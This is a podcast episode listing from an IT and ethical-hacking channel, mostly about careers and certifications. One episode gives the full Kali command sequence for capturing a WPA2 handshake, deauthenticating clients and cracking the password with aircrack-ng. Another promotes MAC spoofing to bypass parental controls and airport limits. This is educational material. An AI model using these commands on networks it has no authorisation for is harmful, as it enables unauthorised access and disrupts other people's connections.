David Bombal
David Bombal
Want to learn about IT? Want to get ahead in your career? Well, this is the right place!
On this channel, I discuss Python, Ethical Hacking, Networking, Network Automation, CCNA, Virtualization and other IT related topics.
This YouTube channel has new videos every week! Subscribe for technical, detailed, no fluff content.
David’s details:
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
Website: http://www.davidbombal.com
YouTube: https://www.youtube.com/davidbombal
All the best!
David
On this channel, I discuss Python, Ethical Hacking, Networking, Network Automation, CCNA, Virtualization and other IT related topics.
This YouTube channel has new videos every week! Subscribe for technical, detailed, no fluff content.
David’s details:
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
Website: http://www.davidbombal.com
YouTube: https://www.youtube.com/davidbombal
All the best!
David
Episodes
Mentioned books

Feb 8, 2021 • 25min
#250: Get A Cert, Get A Hacking Job
Get cert, get job?
Want to be a hacker?
Do you need to get the CEH or OSCP certifications?
Want a job? Just DM Neal (joking)!
Menu:
Which hacking certifications are worth it? 0:00
Is the CEH is worth it for jobs? 0:26
A massive issue with certs: 5:24
What about Security+ Dod 8570: 6:48
Gatekeeper certs: 9:12
What is the top one cert to get today: 12:40
Which certs if you have time and money: 13:37
How networking can change your life: 14:04
Social media has changed everything: 16:50
DM Neal if you want a job: 17:07
Intern strategy: 18:03
How to start: 19:29
How to open doors: 19:46
Real world example: 20:17
It's who they know: 21:20
It's not get cert, get job: 21:46
================
Previous Video:
================
Start here: https://youtu.be/SFbV7sTSAlA
================
Links:
================
INE Free training: https://ine.com/pages/cybersecurity
eLearn Security: https://elearnsecurity.com/product/ej...
OSCP: https://www.offensive-security.com/co...
SANS: https://www.sans.org/
Hack the box: https://www.hackthebox.eu/
Try Hack Me: https://tryhackme.com/
CTF Time: https://ctftime.org/ctf-wtf/
CEH: https://www.eccouncil.org/programs/ce...
Cyber Blue: https://securityblue.team/
Cyber Defenders: https://cyberdefenders.org/
================
Connect with Neal:
================
LinkedIn: https://www.linkedin.com/in/nealbridges/
Twitter: https://twitter.com/ITJunkie
Twitch: https://www.twitch.tv/cyber_insecurity
================
Connect with me:
================
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
================
Support me:
================
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10
hack
hacker
hacking
nsa
nsa hacker
nsa hacking
ethical hacking
ceh
oscp
ine
try hack me
hack the box
hacking
ethical hacker
oscp certification
ctf for beginners
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

Feb 8, 2021 • 14min
#249: Cracking WiFi WPA2 Handshake
Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video.
Menu:
Use airmon-ng to crack WiFi networks: 0:00
Network Adapter to use: 0:46
Kali Linux setup: 1:20
Plug in network adapter: 1:35
Verify that network adapter is recognized by Kali Linux: 2:04
WPA2 network to crack: 2:43
iwconfig: 3:27
Kali Version: 3:34
Kill conflicting processes with airmon-ng: 3:55
Put interface into monitor mode: 4:32
Discover WiFi Networks with airodump-ng: 5:15
Use airodump-ng to view only one network: 6:20
Connect to network using an iPhone: 6:39
airodump-ng capture WPA2 four way handshake: 6:58
Use aireplay-ng to deauthenticate clients: 7:25
WPA2 four way handshake captured: 8:08
Use Wireshark to view WPA2 four way handshake: 8:38
Put interface back into managed mode: 9:30
Crack WPA2 password with aircrack-ng: 10:10
Password cracked: 11:00
WiFi router WPA2 settings: 12:00
Summary: 12:40
================
Network Adapters:
================
Alfa AWUS036NHA: https://amzn.to/3qbQGKN
Alfa AWUSO36NH: https://amzn.to/3moeQiI
================
Commands used:
================
! See version of Kali
cat /etc/os-release
uname -a
! See interfaces
ip addr
iwconfig
!kill processes
sudo airmon-ng check kill
!Start monitor mode
sudo airmon-ng start wlan0
!Verify that monitor mode is used
sudo airmon-ng
!You could also use iwconfig to check that interface is in monitor mode:
iwconfig
! Get the AP's MAC address and channel
sudo airodump-ng wlan0mon
! AP-MAC & channel - you need to select your own here:
ESSID: 90:9A:4A:B8:F3:FB
Channel used by AP for SSID: 2
!1st Window:
!Make sure you replace the channel number and bssid with your own
!Replace hack1 with your file name like capture1 or something
sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon
!2nd Window - deauth attack
!Make sure you replace the bssid with your own
sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon
!Use Wireshark to open hack file
wireshark hack1-01.cap
!Filter Wireshark messages for EAPOL
eapol
!Stop monitor mode
airmon-ng stop wlan0mon
!Crack file with Rock you or another wordlist
!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack1-01.cap with your file name
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
================
Previous videos:
================
Kali Installation: https://youtu.be/VAMP8DqSDjg
WPA2 GPU password cracking: https://youtu.be/J8A8rKFZW-M
Wordlists (rockyou): https://youtu.be/rgWcguAg-XA
================
Connect with me:
================
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
================
Support me:
================
Buy my CCNA course and support me:
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10
======================
Special Offers:
======================
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P
wifi
kali linux
kali linux 2020
kali linux 2020.4
wifite
wpa
wep
wps
alfa
comptia
ceh
oscp
wifi
airmon-ng
aircrack-ng
hack
hacker
hacking
ethical hacking
kali
ine
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

Feb 5, 2021 • 18min
248: Python MAC address changer (Windows 10 MAC spoofing)
Python hacking script to change Windows 10 WiFi MAC address. Use this script to spoof a new WiFi mac address. It's really easy to change your Windows Wi-Fi MAC Address using this Python script.
Menu:
Python script to change MAC address: 0:00
Change Windows 10 MAC address: 0:22
Bypass Airport restrictions: 0:38
Bypass Parental controls on WiFi network: 1:00
Two laptops used: Dell XPS and ASUS: 1:10
Python script has lots of comments: 1:38
Learn Python if you want to be an Ethical hacker: 1:51
Demonstration of WiFi Mac address changer: 2:10
Run Python MAC Address changer script: 2:53
Warning: Duplicate MAC Addresses: 4:50
Disable and re-enable WiFi Interface: 5:15
Change a physical or virtual interface MAC address: 6:08
Change Dell WiFi MAC address using Python: 7:14
Python script import winreg subprocess: 9:23
Windows getmac command explained: 10:00
Which MAC address do you want to use: 10:49
Important Windows 10 MAC Address settings: 11:10
Regular expressions: 12:00
getmac not working: 12:22
Which MAC address do you want to use? 13:40
Write MAC address to the registry: 14:40
Windows Registry: 15:20
Python code to disable and enable the Wifi Interface: 16:12
Download the code from github: 16:56
============
Python code:
============
Python script download (github): https://bit.ly/python-change-mac
======================
Free Cheatsheet (PDF):
======================
Download the PDF here: http://bit.ly/windowsmacaddress
Previous video: https://youtu.be/V3Pcc8b_m0U
======
Errata:
======
In the video I showed a MAC address of 0AFACEBOOK01. This should have been 0AFACEBOOC01 because Hexadecimal values are in the range 0 to F. The script will still work and Windows will (in my tests) use a MAC Address of 0AFACEB0001 (in other words, it will replace K with 0).
================
Connect with me:
================
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
hack
hacker
hacking
python
python hacking
python script
windows 10
mac addresses
Windows 10 mac address
mac address hacking
mac address spoofing
hacking
hacker
ethical hacking
parental controls
bypass parental controls
kali linux
hacking
ethical hacking
ceh
oscp
comptia
ine
mac spoofing
macchanger
change mac address windows 10

Jan 26, 2021 • 55min
#247: Am I too old to get into Cybersecurity?
Apologies for the audio on this video. Neal had a technical issue with his audio, so we had to use a backup.
Menu:
Am I too old to get into cybersecurity? 0:00
There are 3.5 million jobs: 1:17
Resume review: 2:36
There is a wide range of jobs: 3:41
Examples of jobs in Cybersecurity: 5:30
Change your perspective: 8:48
Take your other skills to your future learning: 10:20
When are you too old? 11:32
Give me the path: 12:45
It's a journey and paths: 16:07
Baseline skills: 19:38
Four domains: 20:44
Mr Robot vs Real World: 24:07
I don't feel worthy: 27:55
I'm too young. I'm too old. 35:58
I walked in the snow barefoot: 37:55
How to keep balance: 40:15
Let me Google that for you: 43:28
Put in the work: 44:49
Take responsibility: 49:00
Neal helps someone who DM'd him: 50:04
Neal's shirt: 51:57
Haters: 52:57
Neal's shirt: https://www.zerodayclothing.com/
================
Connect with Neal:
================
LinkedIn: https://www.linkedin.com/in/nealbridges/
Twitter: https://twitter.com/ITJunkie
Twitch: https://www.twitch.tv/cyber_insecurity
YouTube: https://www.youtube.com/channel/UCL4J...
================
Connect with me:
================
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
================
Support me:
================
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10
======================
Special Offers:
======================
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P
hack
hacker
hacking
cybersecurity
jobs
cybersecurity jobs
nsa
nsa hacker
nsa hacking
ethical hacking
ceh
oscp
ine
try hack me
hack the box
hacking
ethical hacker
oscp certification
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

Jan 26, 2021 • 5min
#246: Which Song Is That?
Menu:
Which song is that? 0:00
Swipe down: 0:18
How to enable: 0:52
Use Siri: 1:35
Install application (not required on iOS): 2:24
You cannot remember everything: 3:05
================
Connect with me:
================
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
iphone
apple
music
shazam apple
shazam
ios
ios 14
music
epidemic sound
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

Jan 20, 2021 • 36min
#245: Former NSA Hacker- Top Skills, Jobs And Hacking In 2021
How to win at this Ethical Hacking game! Former NSA Hacker discusses the SolarWinds hack, jobs, top skills to learn to be an Ethical hacker, operating systems to use and a lot more.
Menu:
Former NSA Hacker interview - Neal Bridges: 0:00
Pentester for life? 1:13
SolarWinds hack: 2:13
Will the SolarWinds hack mean more jobs? 7:50
SolarWinds hack sophistication: 11:04
Do hackers have to learn to code: 14:06
Top 3 coding skills to learn for hacking: 15:35
Are scripts allowed? 17:48
When do I move from being a script kiddie to being a hacker? 19:38
Egos and toxicity in Ethical Hacking: 20:37
Use it to your advantage: 25:01
Top skill to learn to go far in Ethical Hacking: 26:21
Will it help you earn more money? 27:41
Technical skills required? 29:27
Which Operating System should I use (macOS, Windows, Linux)? 31:06
Put people others into a box: 33:46
Many paths: 35:02
================
Previous Video:
================
First interview: https://youtu.be/SFbV7sTSAlA
=======================
Movie clips used in the intro:
=======================
Angel Has Fallen
The Matrix
White House Down
================
Links:
================
Toxic Cybersecurity: https://www.linkedin.com/pulse/have-w...
INE Free training: https://ine.com/pages/cybersecurity
eLearn Security: https://elearnsecurity.com/product/ej...
OSCP: https://www.offensive-security.com/co...
SANS: https://www.sans.org/
Hack the box: https://www.hackthebox.eu/
Try Hack Me: https://tryhackme.com/
CTF Time: https://ctftime.org/ctf-wtf/
CEH: https://www.eccouncil.org/programs/ce...
Cyber Blue: https://securityblue.team/
Cyber Defenders: https://cyberdefenders.org/
================
Connect with Neal:
================
LinkedIn: https://www.linkedin.com/in/nealbridges/
Twitter: https://twitter.com/ITJunkie
Twitch: https://www.twitch.tv/cyber_insecurity
================
Connect with me:
================
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
================
Support me:
================
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10
======================
Special Offers:
======================
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P
hack
hacker
hacking
solarwinds
solarwinds hack
solarwinds breach
nsa
nsa hacker
nsa hacking
ethical hacking
ceh
oscp
ine
try hack me
hack the box
hacking
ethical hacker
oscp certification
ctf for beginners
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

Jan 20, 2021 • 53min
#244: Ex - NSA Hacker Tells Us How To Get Into Hacking!
This is the path to becoming a hacker. Follow the advice and change your life!
Menu:
How to get experience to become an Ethical hacker: 0:00
Cybersecurity is an amazing industry: 0:26
Welcome Neal: 1:08
Who is Neal Bridges? Air Force, NSA etc: 1:23
Fortune 100 red teams: 2:02
Sans Instructor: 2:30
Red and Blue teams in companies: 3:30
What are red vs blue teams: 4:20
What about jobs? 10 to 1 ratio: 6:42
Do you need a degree? 9:11
Twitch Stream: 10:50
What do I need to do in 2021? 12:38
What is my first cert? OSCP? 16:23
CompTIA Security+, eJPT, PTS, CEH - which one? 18:53
Gatekeepers / recruiters: 20:38
Neal's top 3 things: 23:00
Make sure you do these 3 things: 25:38
How do I document what I've done: 28:13
Get experience part time: 30:30
How to break in part time: 33:18
How to LinkedIn: 35:10
Gary Vee advice: 37:17
Top social networks to join: 38:55
Which is the best cert to get today? 40:08
Great challenges: 41:20
Is social media is bad? 42:11
Exposure: 44:14
Can I get a job at the NSA? 46:30
What do you want Neal to talk about? 49:48
Neal's social media: 50:15
Impostor Syndrome: 50:53
================
Links:
================
INE Free training: https://ine.com/pages/cybersecurity
eLearn Security: https://elearnsecurity.com/product/ej...
OSCP: https://www.offensive-security.com/co...
SANS: https://www.sans.org/
Hack the box: https://www.hackthebox.eu/
Try Hack Me: https://tryhackme.com/
CTF Time: https://ctftime.org/ctf-wtf/
CEH: https://www.eccouncil.org/programs/ce...
Cyber Blue: https://securityblue.team/
Cyber Defenders: https://cyberdefenders.org/
Did I miss something? Please comment.
================
Connect with Neal:
================
LinkedIn: https://www.linkedin.com/in/nealbridges/
Twitter: https://twitter.com/ITJunkie
Twitch: https://www.twitch.tv/cyber_insecurity
================
Connect with me:
================
Discord: http://discord.davidbombal.com
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
================
Support me:
================
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10
======================
Special Offers:
======================
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P
nsa
nsa hacker
nsa hacking
ethical hacking
ceh
oscp
ine
try hack me
hack the box
hacking
ethical hacker
oscp certification
ctf for beginners
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

Jan 20, 2021 • 8min
#243: Top 5 Cloud Certs For 2021
Top 5 cloud certs for 2021. But first, who's paying?
Menu:
Top 5 cloud certifications in 2021: 0:00
Who's paying for the certs? 0:30
I love being paid to learn: 1:00
Be careful of the contract: 1:22
If someone is paying you, then do that: 1:44
Which is most in demand: 2:15
Two main cloud providers: 2:41
First cert: AWS Cloud Practitioner: 3:03
Second: AWS Solutions Architect: 3:24
Third: Security or another: 3:55
Fourth: AZ-900: Microsoft Azure Fundamentals
Fifth: AZ-104: Azure Administrator Associate
Sixth: AZ-500: Azure Security Specialist
AWS Course:
Free AWS course (limited): http://bit.ly/3sdC5iU
AWS course for $10: http://bit.ly/39gGbOE
AWS certs: https://aws.amazon.com/certification/
AZ-900: http://bit.ly/2XBDsK1
AZ-104: http://bit.ly/3i3UCK3
AZ-500: http://bit.ly/3nzjnP9
================
Connect with me:
================
Discord: http://discord.davidbombal.com
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
================
Support me:
================
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10
======================
Special Offers:
======================
ITPro.TV:
https://itpro.tv/davidbombal
30% discount off all plans Code: DAVIDBOMBAL
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P
aws
azure
AWS Cloud Practitioner
AWS Solutions Architect
AWS Security Specialty
AZ-900
Microsoft Azure Fundamentals
AZ-104
Microsoft Certified Azure Administrator Associate
AZ-500
Azure Security Specialist
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

Jan 11, 2021 • 13min
#242: HSRP (CCNA)
FHRP, HSRP, VRRP, GLBP... wait what?
Need help? Join my Discord: https://discord.com/invite/usKSyzb
Menu:
What are FHRPs (First hop redundancy protocols): 0:00
What does HSRP give us? 0:39
Network Topology: 1:39
What happens if there is a problem? 2:49
Configure HSRP on R1: 4:01
Verify HSRP: 6:30
Configure HSRP on R2: 8:37
Test if HSRP actually works: 10:21
================
Connect with me:
================
Discord: http://discord.davidbombal.com
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
================
Support me:
================
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10
======================
Special Offers:
======================
ITPro.TV:
https://itpro.tv/davidbombal
30% discount off all plans Code: DAVIDBOMBAL
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P
ccna
ccna 200-301
ccnp
ccnp encor
hsrp
vrrp
glbp
ccie
ccna certification
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

Jan 11, 2021 • 12min
#241: Python WiFi
Python is such a great language to learn!
Need help? Join my Discord: https://discord.com/invite/usKSyzb
Menu:
Learn how to code with Python: 0:00
Demo: 0:11
Python scripts: 0:56
Windows netsh Commands: 1:32
WiFi profiles: 3:05
Show WiFi: 3:57
Python script demo: 5:06
Python script explanation: 6:15
E-mail information: 9:36
Be careful: 10:01
Scripts: https://bit.ly/2XlIJFu
================
Connect with me:
================
Discord: http://discord.davidbombal.com
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
================
Support me:
================
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10
======================
Special Offers:
======================
ITPro.TV:
https://itpro.tv/davidbombal
30% discount off all plans Code: DAVIDBOMBAL
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P
wifi
netsh
python
netsh wifi
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!


